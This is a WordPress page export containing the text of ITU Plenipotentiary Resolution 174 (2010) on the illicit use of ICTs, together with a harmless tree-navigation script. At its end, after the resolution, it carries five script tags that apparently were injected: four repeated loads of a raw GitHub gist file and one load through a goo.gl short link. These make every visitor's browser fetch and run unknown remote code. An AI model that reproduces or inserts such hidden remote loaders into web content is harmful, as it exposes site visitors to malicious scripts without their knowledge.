{"id":385,"date":"2013-05-18T09:26:51","date_gmt":"2013-05-18T13:26:51","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=385"},"modified":"2015-06-29T23:48:06","modified_gmt":"2015-06-30T03:48:06","slug":"pp_174","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2010\/pp_174\/","title":{"rendered":"PP Resolution 174"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">PP RESOLUTION  174  (Guadalajara, 2010)<\/span><\/h3>\n<h4><span style=\"\">ITU&#8217;s role with regard to international public policy issues relating to the risk of illicit use of information and communication technologies<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union (Guadalajara, 2010),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">aware<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that technological innovation driven by information and communication technologies (ICTs) has significantly modified the ways in which people access telecommunications;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the illicit use of ICTs could have a detrimental impact on a Member State&#8217;s infrastructure, national security and economic development;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that the definition of &#8220;telecommunication&#8221;, as stated in the ITU Constitution, reads as follows: &#8220;Any transmission, emission or reception of signs, signals, writing, images and sounds or intelligence of any nature by wire, radio, optical or other electromagnetic systems&#8221;,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_491848636FM\"><span style=\"\">reaffirming<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        Resolutions 55\/63 and 56\/121 of the United Nations General Assembly, which established the legal framework on countering the criminal misuse of information technologies;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Resolution 57\/239 of the United Nations General Assembly, on the creation of a global culture of cybersecurity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution 58\/199 of the United Nations General Assembly, on the creation of a global culture of cybersecurity and the protection of essential information infrastructures;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        Resolution 41\/65 of the United Nations General Assembly, on principles relating to remote sensing of the Earth from outer space,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_1890655120FM\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that, in the Geneva Declaration of Principles, the World Summit on the Information Society (WSIS) (Geneva, 2003) supported the activities of the United Nations to prevent the potential use of ICTs for purposes that are inconsistent with the objectives of maintaining international stability and security, and may adversely affect the integrity of the infrastructure within States, to the detriment of their security, and that it is necessary to prevent the use of information resources and technologies for criminal and terrorist purposes, while respecting human rights (\u00a7 36, WSIS Geneva Declaration of Principles);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that Action Line C5 (Building confidence and security in the use of ICTs) of the Geneva Plan of Action stipulates the following: &#8220;Governments, in cooperation with the private sector, should prevent, detect and respond to cybercrime and misuse of ICTs by: developing guidelines that take into account ongoing efforts in these areas; considering legislation that allows for effective investigation and prosecution of such misuse; promoting effective mutual assistance efforts; strengthening institutional support at the international level for preventing, detecting and recovering from such incidents; and encouraging education and raising awareness&#8221;,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_1481425550FM\"><span style=\"\">considering further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">that WSIS (Tunis, 2005) identified ITU as moderator for the implementation of Action Line C5 (Building confidence and security in the use of ICTs),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_1093711345FM\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        Resolution 130 (Rev. Antalya, 2006) of the Plenipotentiary Conference, on strengthening the role of ITU in building confidence and security in the use of ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Resolution 102 (Rev. Antalya, 2006) of the Plenipotentiary Conference, on ITU&#8217;s role with regard to international public policy issues pertaining to the Internet and the management of Internet resources, including domain names and addresses;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution 71 (Rev. Antalya, 2006) of the Plenipotentiary Conference, in particular strategic goal 4: &#8220;Developing tools, based on contributions from the membership, to promote end-user confidence, and to safeguard the efficiency, security, integrity and interoperability of networks&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        Resolutions 1282 and 1305 of the ITU Council, the latter of which listed issues pertaining to the use and misuse of the Internet among the main tasks of the role of the Dedicated Group in identifying international Internet-related public policy issues;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        Resolution 45 (Rev. Hyderabad, 2010) of the World Telecommunication Development Conference (WTDC), on mechanisms for enhancing cooperation on cybersecurity, including countering and combating spam;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        the Hyderabad Declaration adopted by WTDC, in particular Programme 2 (Cybersecurity, ICT applications and IP-based network-related issues);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        Resolutions 50 and 52 (Rev. Johannesburg, 2008) of the World Telecommunication Standardization Assembly, on cybersecurity and countering and combating spam,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_271669066FM\"><span style=\"\">recognizing further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that global cooperation and collaboration between the international organizations are necessary in order to address and prevent the illicit use of ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        the moderating and facilitating role assigned to the Union under Action Line C5 as referred to above,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_1214840925FM\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the importance of ICTs, including telecommunications, for the social and economic development of countries, especially developing countries, through the creation of new public services that facilitate public access to information and enhanced transparency within public administrations and can be helpful for the monitoring and observation of climate change, the management of natural resources and reduction of the risk of natural disasters;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        the vulnerability of critical national infrastructures, their increasing dependence on ICTs and the threats resulting from the illicit use of ICTs,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_1380248443FM\"><span style=\"\">resolves to instruct the Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to take the necessary measures in order to:<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)        raise the awareness of Member States regarding the adverse impact that may result from the illicit use of information and communication resources;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">ii)        maintain the role of ITU to cooperate within its mandate with other United Nations bodies in combating the illicit use of ICTs,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_1522120090FM\"><span style=\"\">requests the Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">in his capacity as facilitator for Action Line C5 on building confidence and security in the use of ICTs, to organize meetings of Member States and relevant ICT stakeholders, including geospatial and information service providers, to discuss alternative approaches to solutions to address and prevent the illicit application of ICTs, while taking into consideration the overall interests of the ICT industry,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_1224557154FM\"><span style=\"\">invites Member States and relevant ICT stakeholders<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to pursue their dialogue at the regional and national levels in order to find mutually acceptable solutions,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_524987996FM\"><span style=\"\">invites the Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to collect best practices in terms of actions taken by Member States to prevent the illicit use of ICTs and to provide assistance to interested Member States, as appropriate,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_184750517FM\"><span style=\"\">instructs the Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to report to the Council and to the next plenipotentiary conference on the implementation of this resolution,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\" id=\"FMFreemind_Link_1696856421FM\"><span style=\"\">invites Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to provide the necessary support for the implementation of this resolution.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 174 (Guadalajara, 2010) ITU&#8217;s role with regard to international public policy issues relating to the risk of illicit use of information and communication technologies The Plenipotentiary Conference of the International Telecommunication Union (Guadalajara, 2010), aware a) that technological innovation driven by information and communication technologies (ICTs) has significantly modified the ways in which [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1427,"menu_order":174,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-385","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/385","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=385"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/385\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1427"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=385"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}